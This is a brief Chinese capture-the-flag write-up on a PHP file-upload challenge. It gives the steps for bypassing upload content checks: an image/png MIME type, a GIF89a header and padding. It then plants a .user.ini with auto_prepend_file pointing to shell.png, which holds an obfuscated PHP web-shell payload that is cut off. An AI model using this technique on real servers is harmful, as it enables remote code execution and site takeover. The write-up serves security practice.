目录 思路 总结 思路 直接在burp里面改target和host的值,或者在本地发包 在上传.user.ini发现失败,可能对文件内容进行检测 在多次尝试后,发现文件类型为image/png,文件头加上GIF89a而且文件不能太小,要多加点内容 其他都和上题一样 .user.ini GIF89a auto_prepend_file=shell.png shell.png 记得url解码 GIF89a <?=require~